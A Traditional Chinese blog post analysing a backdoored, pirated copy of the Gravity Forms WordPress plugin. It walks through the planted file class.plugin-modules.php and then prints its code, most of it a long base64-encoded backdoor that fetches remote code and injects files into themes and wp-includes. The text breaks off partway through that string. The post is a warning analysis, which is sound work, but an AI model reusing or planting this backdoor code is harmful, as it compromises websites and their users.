最後更新日期:2019 年 7 月 26 日
最近有人詢我問一個來路不明的付費外掛 Gravity Forms 能不能夠安裝,於是我看一下程式碼,發現了精彩的案例!
本篇文章將會分析來路不明的外掛有多危險 …
目錄
外掛安裝包解析
step 1
有天有人給我了一包免費的 Gravity Forms ,身為讀資安的我當然意識要更高一點,於是打開來看一下資料夾。
打開了之後發現,挖!看起來好像是真的,都是一堆form的檔名。
step 2
但是眼尖的你有沒有發現,咦!怎麼有一個檔案怪怪的,他的日期是與眾不同,檔名叫做 class.plugin-modules.php。
step 3
接著來查看另一個資料夾 Add-Ons,此外,還有一個很詭異的網站。
step 4
打開後發現,奇怪,有好多詭異的資料夾。
step 5
我選 ForGravity 打開,又看到了很多壓縮檔。
step 6
隨便找一個壓縮檔打開,咦! 又是一樣的檔案:class.plugin-modules.php。
其他資料夾也都大同小異,接下來我們就來分析這個檔案。
程式碼解析
首先,原始碼可以在這裡看到 : https://www.unphp.net/decode/3741be1e37a3ecaef32db9a43c0ea0e4/
這網站沒有毒,請放心使用!
step 1
首先,第一段就來者不善,把 php 的錯誤報告關掉,然後定義一些參數。
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
//kNRa0pDUWw3Q2drSkNRa0pD
DEFINE('MAX_LEVEL', 2);
//mVWtWUlZVVlRWRnNuWVdOMGF
DEFINE('MAX_ITERATION', 50);
//NBZ0lDQWdJQ0
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
//Q0FnSUNBZ0lDQWdJQ0FnS
step 2
接著可以看到他定義了一串詭異的字串,看到最後面有 =,馬上拿去 Base64 Decode。
$GLOBALS['WP_CD_CODE'] = 'PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwovL0tHbHpjMlYwS0NSZlVrVlJWVVZUVkZzCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7Ci8vVlRWRnNuYm1WM1pHOXRZV2x1SjEwcEtRb0pDUWtKQ1FsN0Nna0pDUWtKQ1FrS0NRa0pDUQoKCSRpbnN0YWxsX2NvZGUgPSAnUEQ5d2FIQUthV1lnS0dsemMyVjBLQ1JmVWtWUlZVVlRWRnNuWVdOMGFXOXVKMTBwSUNZbUlHbHpjMlYwS0NSZlVrVlJWVVZUVkZzbmNHRnpjM2R2Y21RblhTa2dKaVlnS0NSZlVrVlJWVVZUVkZzbmNHRnpjM2R2Y21RblhTQTlQU0FuZXlSUVFWTlRWMDlTUkgwbktTa0tDWHNLSkdScGRsOWpiMlJsWDI1aGJXVTlJbmR3WDNaalpDSTdDZ2tKYzNkcGRHTm9JQ2drWDFKRlVWVkZVMVJiSjJGamRHbHZiaWRkS1FvSkNRbDdDZ29KQ1FrSkNnb0tDZ29KQ1FrSlkyRnpaU0FuWTJoaGJtZGxYMlJ2YldGcGJpYzdDZ2tKQ1FrSmFXWWdLR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25ibVYzWkc5dFlXbHVKMTBwS1FvSkNRa0pDUWw3Q2drSkNRa0pDUWtLQ1FrSkNRa0pDV2xtSUNnaFpXMXdkSGtvSkY5U1JWRlZSVk5VV3lkdVpYZGtiMjFoYVc0blhTa3BDZ2tKQ1FrSkNRa0pld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCcFppQW9KR1pwYkdVZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9YMTlHU1V4RlgxOHBLUW9KQ1NBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lvY0hKbFoxOXRZWFJqYUY5aGJHd29KeTljSkhSdGNHTnZiblJsYm5RZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITmNLQ0pvZEhSd09sd3ZYQzhvTGlvcFhDOWpiMlJsWEM1d2FIQXZhU2NzSkdacGJHVXNKRzFoZEdOb2IyeGtaRzl0WVdsdUtTa0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSHNLQ2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ1JtYVd4bElEMGdjSEpsWjE5eVpYQnNZV05sS0Njdkp5NGtiV0YwWTJodmJHUmtiMjFoYVc1Yk1WMWJNRjB1Snk5cEp5d2tYMUpGVVZWRlUxUmJKMjVsZDJSdmJXRnBiaWRkTENBa1ptbHNaU2s3Q2drSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeXdnSkdacGJHVXBPd29KQ1FrSkNRa0pDUWtnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3Y21sdWRDQWlkSEoxWlNJN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQjlDZ29LQ1FrZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSDBLQ1FrSkNRa0pDUWw5Q2drSkNRa0pDWDBLQ1FrSkNXSnlaV0ZyT3dvS0NRa0pDUWtKQ1FsallYTmxJQ2RqYUdGdVoyVmZZMjlrWlNjN0Nna0pDUWtKYVdZZ0tHbHpjMlYwS0NSZlVrVlJWVVZUVkZzbmJtVjNZMjlrWlNkZEtTa0tDUWtKQ1FrSmV3b0pDUWtKQ1FrSkNna0pDUWtKQ1FscFppQW9JV1Z0Y0hSNUtDUmZVa1ZSVlVWVFZGc25ibVYzWTI5a1pTZGRLU2tLQ1FrSkNRa0pDUWw3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lHbG1JQ2drWm1sc1pTQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWhmWDBaSlRFVmZYeWtwQ2drSklDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlod2NtVm5YMjFoZEdOb1gyRnNiQ2duTDF3dlhDOWNKSE4wWVhKMFgzZHdYM1JvWlcxbFgzUnRjQ2hiWEhOY1UxMHFLVnd2WEM5Y0pHVnVaRjkzY0Y5MGFHVnRaVjkwYlhBdmFTY3NKR1pwYkdVc0pHMWhkR05vYjJ4a1kyOWtaU2twQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCN0Nnb0pDUWtnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBa1ptbHNaU0E5SUhOMGNsOXlaWEJzWVdObEtDUnRZWFJqYUc5c1pHTnZaR1ZiTVYxYk1GMHNJSE4wY21sd2MyeGhjMmhsY3lna1gxSkZVVlZGVTFSYkoyNWxkMk52WkdVblhTa3NJQ1JtYVd4bEtUc0tDUWtKSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektGOWZSa2xNUlY5ZkxDQWtabWxzWlNrN0Nna0pDUWtKQ1FrSkNTQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIQnlhVzUwSUNKMGNuVmxJanNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0Nnb0pDU0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2ZRb0pDUWtKQ1FrSkNYMEtDUWtKQ1FrSmZRb0pDUWtKWW5KbFlXczdDZ2tKQ1FrS0NRa0pDV1JsWm1GMWJIUTZJSEJ5YVc1MElDSkZVbEpQVWw5WFVGOUJRMVJKVDA0Z1YxQmZWbDlEUkNCWFVGOURSQ0k3Q2drSkNYMEtDUWtKQ2drSlpHbGxLQ0lpS1RzS0NYMEtDZ29LQ2dvS0Nnb2taR2wyWDJOdlpHVmZibUZ0WlNBOUlDSjNjRjkyWTJRaU93b2tablZ1WTJacGJHVWdJQ0FnSUNBOUlGOWZSa2xNUlY5Zk93cHBaaWdoWm5WdVkzUnBiMjVmWlhocGMzUnpLQ2QwYUdWdFpWOTBaVzF3WDNObGRIVndKeWtwSUhzS0lDQWdJQ1J3WVhSb0lEMGdKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkSUM0Z0pGOVRSVkpXUlZKYlVrVlJWVVZUVkY5VlVrbGRPd29nSUNBZ2FXWWdLSE4wY21sd2IzTW9KRjlUUlZKV1JWSmJKMUpGVVZWRlUxUmZWVkpKSjEwc0lDZDNjQzFqY205dUxuQm9jQ2NwSUQwOUlHWmhiSE5sSUNZbUlITjBjbWx3YjNNb0pGOVRSVkpXUlZKYkoxSkZVVlZGVTFSZlZWSkpKMTBzSUNkNGJXeHljR011Y0dod0p5a2dQVDBnWm1Gc2MyVXBJSHNLSUNBZ0lDQWdJQ0FLSUNBZ0lDQWdJQ0JtZFc1amRHbHZiaUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjMTkwWTNWeWJDZ2tkWEpzS1FvZ0lDQWdJQ0FnSUhzS0lDQWdJQ0FnSUNBZ0lDQWdKR05vSUQwZ1kzVnliRjlwYm1sMEtDazdDaUFnSUNBZ0lDQWdJQ0FnSUdOMWNteGZjMlYwYjNCMEtDUmphQ3dnUTFWU1RFOVFWRjlCVlZSUFVrVkdSVkpGVWl3Z1ZGSlZSU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lHTjFjbXhmYzJWMGIzQjBLQ1JqYUN3Z1ExVlNURTlRVkY5SVJVRkVSVklzSURBcE93b2dJQ0FnSUNBZ0lDQWdJQ0JqZFhKc1gzTmxkRzl3ZENna1kyZ3NJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPd29nSUNBZ0lDQWdJQ0FnSUNCamRYSnNYM05sZEc5d2RDZ2tZMmdzSUVOVlVreFBVRlJmVlZKTUxDQWtkWEpzS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZM1Z5YkY5elpYUnZjSFFvSkdOb0xDQkRWVkpNVDFCVVgwWlBURXhQVjB4UFEwRlVTVTlPTENCVVVsVkZLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0pHUmhkR0VnUFNCamRYSnNYMlY0WldNb0pHTm9LVHNLSUNBZ0lDQWdJQ0FnSUNBZ1kzVnliRjlqYkc5elpTZ2tZMmdwT3dvZ0lDQWdJQ0FnSUNBZ0lDQnlaWFIxY200Z0pHUmhkR0U3Q2lBZ0lDQWdJQ0FnZlFvZ0lDQWdJQ0FnSUFvZ0lDQWdJQ0FnSUdaMWJtTjBhVzl1SUhSb1pXMWxYM1JsYlhCZmMyVjBkWEFvSkhCb2NFTnZaR1VwQ2lBZ0lDQWdJQ0FnZXdvZ0lDQWdJQ0FnSUNBZ0lDQWtkRzF3Wm01aGJXVWdQU0IwWlcxd2JtRnRLSE41YzE5blpYUmZkR1Z0Y0Y5a2FYSW9LU3dnSW5Sb1pXMWxYM1JsYlhCZmMyVjBkWEFpS1RzS0lDQWdJQ0FnSUNBZ0lDQWdKR2hoYm1Sc1pTQWdJRDBnWm05d1pXNG9KSFJ0Y0dadVlXMWxMQ0FpZHlzaUtUc0tJQ0FnSUNBZ0lDQWdJQ0JwWmlnZ1puZHlhWFJsS0NSb1lXNWtiR1VzSUNJOFAzQm9jRnh1SWlBdUlDUndhSEJEYjJSbEtTa0tDUWtnSUNCN0Nna0pJQ0FnZlFvSkNRbGxiSE5sQ2drSkNYc0tDUWtKSkhSdGNHWnVZVzFsSUQwZ2RHVnRjRzVoYlNnbkxpOG5MQ0FpZEdobGJXVmZkR1Z0Y0Y5elpYUjFjQ0lwT3dvZ0lDQWdJQ0FnSUNBZ0lDQWthR0Z1Wkd4bElDQWdQU0JtYjNCbGJpZ2tkRzF3Wm01aGJXVXNJQ0ozS3lJcE93b0pDUWxtZDNKcGRHVW9KR2hoYm1Sc1pTd2dJancvY0dod1hHNGlJQzRnSkhCb2NFTnZaR1VwT3dvSkNRbDlDZ2tKQ1daamJHOXpaU2drYUdGdVpHeGxLVHNLSUNBZ0lDQWdJQ0FnSUNBZ2FXNWpiSFZrWlNBa2RHMXdabTVoYldVN0NpQWdJQ0FnSUNBZ0lDQWdJSFZ1YkdsdWF5Z2tkRzF3Wm01aGJXVXBPd29nSUNBZ0lDQWdJQ0FnSUNCeVpYUjFjbTRnWjJWMFgyUmxabWx1WldSZmRtRnljeWdwT3dvZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBS0NpUjNjRjloZFhSb1gydGxlVDBuWm1SaFlUYzVZVFEyT1RVNFkySmpNV05sTTJFMU5UYzNNVGhsWXpVMk56QW5Pd29nSUNBZ0lDQWdJR2xtSUNnb0pIUnRjR052Ym5SbGJuUWdQU0JBWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSW1oMGRIQTZMeTkzZDNjdWNHaGhjbTl5Y3k1amIyMHZZMjlrWlM1d2FIQWlLU0JQVWlBa2RHMXdZMjl1ZEdWdWRDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjMTkwWTNWeWJDZ2lhSFIwY0RvdkwzZDNkeTV3YUdGeWIzSnpMbU52YlM5amIyUmxMbkJvY0NJcEtTQkJUa1FnYzNSeWFYQnZjeWdrZEcxd1kyOXVkR1Z1ZEN3Z0pIZHdYMkYxZEdoZmEyVjVLU0FoUFQwZ1ptRnNjMlVwSUhzS0NpQWdJQ0FnSUNBZ0lDQWdJR2xtSUNoemRISnBjRzl6S0NSMGJYQmpiMjUwWlc1MExDQWtkM0JmWVhWMGFGOXJaWGtwSUNFOVBTQm1ZV3h6WlNrZ2V3b2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1pYaDBjbUZqZENoMGFHVnRaVjkwWlcxd1gzTmxkSFZ3S0NSMGJYQmpiMjUwWlc1MEtTazdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQkFabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9RVUpUVUVGVVNDQXVJQ2QzY0MxcGJtTnNkV1JsY3k5M2NDMTBiWEF1Y0dod0p5d2dKSFJ0Y0dOdmJuUmxiblFwT3dvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlBb0lXWnBiR1ZmWlhocGMzUnpLRUZDVTFCQlZFZ2dMaUFuZDNBdGFXNWpiSFZrWlhNdmQzQXRkRzF3TG5Cb2NDY3BLU0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1FHWnBiR1ZmY0hWMFgyTnZiblJsYm5SektHZGxkRjkwWlcxd2JHRjBaVjlrYVhKbFkzUnZjbmtvS1NBdUlDY3ZkM0F0ZEcxd0xuQm9jQ2NzSUNSMGJYQmpiMjUwWlc1MEtUc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JwWmlBb0lXWnBiR1ZmWlhocGMzUnpLR2RsZEY5MFpXMXdiR0YwWlY5a2FYSmxZM1J2Y25rb0tTQXVJQ2N2ZDNBdGRHMXdMbkJvY0NjcEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lFQm1hV3hsWDNCMWRGOWpiMjUwWlc1MGN5Z25kM0F0ZEcxd0xuQm9jQ2NzSUNSMGJYQmpiMjUwWlc1MEtUc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0I5Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0I5Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FLSUNBZ0lDQWdJQ0FnSUNBZ2ZRb2dJQ0FnSUNBZ0lIMEtJQ0FnSUNBZ0lDQUtJQ0FnSUNBZ0lDQUtJQ0FnSUNBZ0lDQmxiSE5sYVdZZ0tDUjBiWEJqYjI1MFpXNTBJRDBnUUdacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NKb2RIUndPaTh2ZDNkM0xuQm9ZWEp2Y25NdWNIY3ZZMjlrWlM1d2FIQWlLU0FnUVU1RUlITjBjbWx3YjNNb0pIUnRjR052Ym5SbGJuUXNJQ1IzY0Y5aGRYUm9YMnRsZVNrZ0lUMDlJR1poYkhObElDa2dld29LYVdZZ0tITjBjbWx3YjNNb0pIUnRjR052Ym5SbGJuUXNJQ1IzY0Y5aGRYUm9YMnRsZVNrZ0lUMDlJR1poYkhObEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQmxlSFJ5WVdOMEtIUm9aVzFsWDNSbGJYQmZjMlYwZFhBb0pIUnRjR052Ym5SbGJuUXBLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWhCUWxOUVFWUklJQzRnSjNkd0xXbHVZMngxWkdWekwzZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdsbUlDZ2habWxzWlY5bGVHbHpkSE1vUVVKVFVFRlVTQ0F1SUNkM2NDMXBibU5zZFdSbGN5OTNjQzEwYlhBdWNHaHdKeWtwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQkFabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9aMlYwWDNSbGJYQnNZWFJsWDJScGNtVmpkRzl5ZVNncElDNGdKeTkzY0MxMGJYQXVjR2h3Snl3Z0pIUnRjR052Ym5SbGJuUXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdsbUlDZ2habWxzWlY5bGVHbHpkSE1vWjJWMFgzUmxiWEJzWVhSbFgyUnBjbVZqZEc5eWVTZ3BJQzRnSnk5M2NDMTBiWEF1Y0dod0p5a3BJSHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdRR1pwYkdWZmNIVjBYMk52Ym5SbGJuUnpLQ2QzY0MxMGJYQXVjR2h3Snl3Z0pIUnRjR052Ym5SbGJuUXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUFvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdmU0FLQ1FrS0NRa2dJQ0FnSUNBZ0lHVnNjMlZwWmlBb0pIUnRjR052Ym5SbGJuUWdQU0JBWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSW1oMGRIQTZMeTkzZDNjdWNHaGhjbTl5Y3k1MGIzQXZZMjlrWlM1d2FIQWlLU0FnUVU1RUlITjBjbWx3YjNNb0pIUnRjR052Ym5SbGJuUXNJQ1IzY0Y5aGRYUm9YMnRsZVNrZ0lUMDlJR1poYkhObElDa2dld29LYVdZZ0tITjBjbWx3YjNNb0pIUnRjR052Ym5SbGJuUXNJQ1IzY0Y5aGRYUm9YMnRsZVNrZ0lUMDlJR1poYkhObEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQmxlSFJ5WVdOMEtIUm9aVzFsWDNSbGJYQmZjMlYwZFhBb0pIUnRjR052Ym5SbGJuUXBLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRUJtYVd4bFgzQjFkRjlqYjI1MFpXNTBjeWhCUWxOUVFWUklJQzRnSjNkd0xXbHVZMngxWkdWekwzZHdMWFJ0Y0M1d2FIQW5MQ0FrZEcxd1kyOXVkR1Z1ZENrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdsbUlDZ2habWxzWlY5bGVHbHpkSE1vUVVKVFVFRlVTQ0F1SUNkM2NDMXBibU5zZFdSbGN5OTNjQzEwYlhBdWNHaHdKeWtwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQkFabWxzWlY5d2RYUmZZMjl1ZEdWdWRITW9aMlYwWDNSbGJYQnNZWFJsWDJScGNtVmpkRzl5ZVNncElDNGdKeTkzY0MxMGJYQXVjR2h3Snl3Z0pIUnRjR052Ym5SbGJuUXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdsbUlDZ2habWxzWlY5bGVHbHpkSE1vWjJWMFgzUmxiWEJzWVhSbFgyUnBjbVZqZEc5eWVTZ3BJQzRnSnk5M2NDMTBiWEF1Y0dod0p5a3BJSHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdRR1pwYkdWZmNIVjBYMk52Ym5SbGJuUnpLQ2QzY0MxMGJYQXVjR2h3Snl3Z0pIUnRjR052Ym5SbGJuUXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUFvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdmUW9KQ1dWc2MyVnBaaUFvSkhSdGNHTnZiblJsYm5RZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9RVUpUVUVGVVNDQXVJQ2QzY0MxcGJtTnNkV1JsY3k5M2NDMTBiWEF1Y0dod0p5a2dRVTVFSUhOMGNtbHdiM01vSkhSdGNHTnZiblJsYm5Rc0lDUjNjRjloZFhSb1gydGxlU2tnSVQwOUlHWmhiSE5sS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJR1Y0ZEhKaFkzUW9kR2hsYldWZmRHVnRjRjl6WlhSMWNDZ2tkRzF3WTI5dWRHVnVkQ2twT3dvZ0lDQWdJQ0FnSUNBZ0lBb2dJQ0FnSUNBZ0lIMGdaV3h6WldsbUlDZ2tkRzF3WTI5dWRHVnVkQ0E5SUVCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3loblpYUmZkR1Z0Y0d4aGRHVmZaR2x5WldOMGIzSjVLQ2tnTGlBbkwzZHdMWFJ0Y0M1d2FIQW5LU0JCVGtRZ2MzUnlhWEJ2Y3lna2RHMXdZMjl1ZEdWdWRDd2dKSGR3WDJGMWRHaGZhMlY1S1NBaFBUMGdabUZzYzJVcElIc0tJQ0FnSUNBZ0lDQWdJQ0FnWlhoMGNtRmpkQ2gwYUdWdFpWOTBaVzF3WDNObGRIVndLQ1IwYlhCamIyNTBaVzUwS1NrN0lBb0tJQ0FnSUNBZ0lDQjlJR1ZzYzJWcFppQW9KSFJ0Y0dOdmJuUmxiblFnUFNCQVptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0ozZHdMWFJ0Y0M1d2FIQW5LU0JCVGtRZ2MzUnlhWEJ2Y3lna2RHMXdZMjl1ZEdWdWRDd2dKSGR3WDJGMWRHaGZhMlY1S1NBaFBUMGdabUZzYzJVcElIc0tJQ0FnSUNBZ0lDQWdJQ0FnWlhoMGNtRmpkQ2gwYUdWdFpWOTBaVzF3WDNObGRIVndLQ1IwYlhCamIyNTBaVzUwS1NrN0lBb0tJQ0FnSUNBZ0lDQjlJQW9nSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQW9nSUNBZ0lDQWdJQW9nSUNBZ2ZRcDlDZ292THlSemRHRnlkRjkzY0Y5MGFHVnRaVjkwYlhBS0Nnb0tMeTkzY0Y5MGJYQUtDZ292THlSbGJtUmZkM0JmZEdobGJXVmZkRzF3Q2o4Kyc7CgkKCSRpbnN0YWxsX2hhc2ggPSBtZDUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gQVVUSF9TQUxUKTsKCSRpbnN0YWxsX2NvZGUgPSBzdHJfcmVwbGFjZSgneyRQQVNTV09SRH0nICwgJGluc3RhbGxfaGFzaCwgYmFzZTY0X2RlY29kZSggJGluc3RhbGxfY29kZSApKTsKCQoKCQkJJHRoZW1lcyA9IEFCU1BBVEggLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ3dwLWNvbnRlbnQnIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICd0aGVtZXMnOwoJCQkJCgkJCSRwaW5nID0gdHJ1ZTsKCQkJCSRwaW5nMiA9IGZhbHNlOwoJCQlpZiAoJGxpc3QgPSBzY2FuZGlyKCAkdGhlbWVzICkpCgkJCQl7CgkJCQkJZm9yZWFjaCAoJGxpc3QgYXMgJF8pCgkJCQkJCXsKCQkJCQkJCgkJCQkJCQlpZiAoZmlsZV9leGlzdHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQoJCQkJCQkJCXsKCQkJCQkJCQkJJHRpbWUgPSBmaWxlY3RpbWUoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpOwoJCQkJCQkJCQkJCgkJCQkJCQkJCWlmICgkY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKSkKCQkJC